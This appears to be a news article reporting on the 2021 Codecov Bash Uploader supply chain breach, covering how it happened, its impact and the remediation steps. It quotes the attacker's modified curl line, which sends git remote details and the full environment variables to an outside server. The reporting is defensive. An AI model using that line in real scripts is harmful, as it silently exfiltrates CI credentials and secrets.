More information has become available about the recent Codecov framework breach, which may have impacted a large number of projects. Read on to know more about it…
Security response experts are struggling to assess the impact of a Codecov Bash Uploader software supply chain breach that went undetected since January and revealed confidential secrets such as tokens, keys, and credentials from organisations all over the world.
The supply chain attack comes just two weeks after another significant issue was discovered affecting the popular PHP language repository that saw two malicious commits with backdoors being injected into its source code.
Codecov said in a note recognising the seriousness of the breach that this hacking incident happened four months ago, but a Codecov customer found it in the wild on April 1, 2021.
“On Thursday, April 1, 2021, we learned that someone had gained unauthorized access to our Bash Uploader script and modified it without our permission. The actor gained access because of an error in Codecov’s Docker image creation process that allowed the actor to extract the credential required to modify our Bash Uploader script,” Codecov said.
Technical Observations
Since January of this year, a malicious change to a shell script has gone undetected at software testing coverage report provider Codecov, raising concerns of yet another major supply chain attack. According to forensic analysis, an unknown threat actor took advantage of a flaw in Codecov’s Docker container image development process to gain access to the credential that enabled the company’s Bash Uploader script to be modified.
A Google Cloud Storage key was accessed on January 31 this year, according to Codecov, and was not secured until April 1 US time. The script was modified to send the UNIX shell environment, which can be used to store variables, instead of uploading coverage reports to Codecov.
One part of the Bash Uploader script was changed by a hacker to:
curl -sm 0.5 -d “$(git remote -v)<<<<<< ENV $(env)” http:///upload/v2 || true
According to Codecov, the hacked script might theoretically submit any passwords, tokens, or keys passed through customers’ continuous integration runners. Codecov said that this may reveal facilities, data stores, and application code that can be accessed using passwords, tokens, or keys.
The origin repository’s git links, which were used to upload coverage reports, are also among the information that could be accessed. The data was received on a server hosted by Digital Ocean, a cloud infrastructure provider.
According to security experts, the hack may have affected a significant number of critical software projects. Other scripts that use the Bash uploader include codecov-actions for Github, codecov for CircleCI Orb, and Codecov Bitrise phase.
If users’ CI pipelines are configured to retrieve the Bash Uploader, the self-hosted version of Codecov is unlikely to be affected.
Damage Control
Users should immediately invalidate all existing passwords, tokens, or keys stored in their environment variables and create new ones, according to Codecov.
The “env” command in the CI pipelines can be used to review what’s stored in the environment.
Codecov claims that it has rotated all credentials, including the key stolen by the hackers, as well as set up monitoring and auditing to ensure the Bash Uploader is never compromised again.
This hacking incident has also been identified to federal police in the United States, and the hackers’ webserver will be properly decommissioned and auditable so that more details can be gleaned from it.
More than 29,000 businesses, according to the company, use its code coverage insights to verify code consistency and maintain code coverage. Codecov did not state how many customers were affected or whose data was compromised as a result of the breach.